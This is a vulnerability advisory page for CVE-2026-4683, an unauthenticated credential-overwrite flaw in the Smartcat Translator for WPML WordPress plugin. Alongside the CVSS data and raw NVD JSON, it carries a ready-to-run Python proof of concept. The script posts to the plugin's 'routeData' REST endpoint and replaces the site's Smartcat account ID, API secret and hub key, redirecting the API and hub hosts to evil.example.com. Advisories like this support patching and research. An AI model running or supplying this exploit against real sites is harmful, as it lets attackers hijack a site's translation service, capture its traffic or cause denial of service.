Security Vulnerability Report
中文
CVE-2026-4683 CVSS 6.5 MEDIUM

CVE-2026-4683

Published: 2026-05-15 09:16:16
Last Modified: 2026-05-15 14:09:16
Source: [email protected]

Description

The Smartcat Translator for WPML plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'routeData' REST endpoint in all versions up to, and including, 3.1.77. This makes it possible for unauthenticated attackers to overwrite the plugin's Smartcat API credentials (account ID, API secret key, hub key, API host, and hub host), effectively hijacking the translation service or causing a denial of service.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Smartcat Translator for WPML <= 3.1.77

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests def exploit_poc(target_url): """ PoC for CVE-2026-4683: Unauthenticated credential overwrite via REST API. """ # The vulnerable endpoint path (may vary based on plugin registration) endpoint = f"{target_url}/wp-json/smartcat-wpml/v1/routeData" # Malicious payload to overwrite existing credentials malicious_data = { "account_id": "hacked_account_id", "api_secret": "hacked_api_secret", "hub_key": "hacked_hub_key", "api_host": "evil.example.com", "hub_host": "evil.example.com" } try: # Send POST request without authentication headers response = requests.post(endpoint, json=malicious_data, timeout=10) if response.status_code == 200: print("[+] Potential success: Server responded with 200 OK.") print(f"[+] Response: {response.text}") else: print(f"[-] Exploit failed: Status code {response.status_code}") print(f"[-] Response: {response.text}") except Exception as e: print(f"[!] Error: {e}") if __name__ == "__main__": import sys if len(sys.argv) < 2: print("Usage: python poc.py <http://target-site>") else: exploit_poc(sys.argv[1])

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-4683", "sourceIdentifier": "[email protected]", "published": "2026-05-15T09:16:16.487", "lastModified": "2026-05-15T14:09:15.910", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Smartcat Translator for WPML plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'routeData' REST endpoint in all versions up to, and including, 3.1.77. This makes it possible for unauthenticated attackers to overwrite the plugin's Smartcat API credentials (account ID, API secret key, hub key, API host, and hub host), effectively hijacking the translation service or causing a denial of service."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/smartcat-wpml/trunk/includes/Controllers/CallbackController.php#L10", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/smartcat-wpml/trunk/includes/Services/Plugin/Router.php#L18", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3524382/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6a9397ed-eddf-466b-b810-1e2f45afd291?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.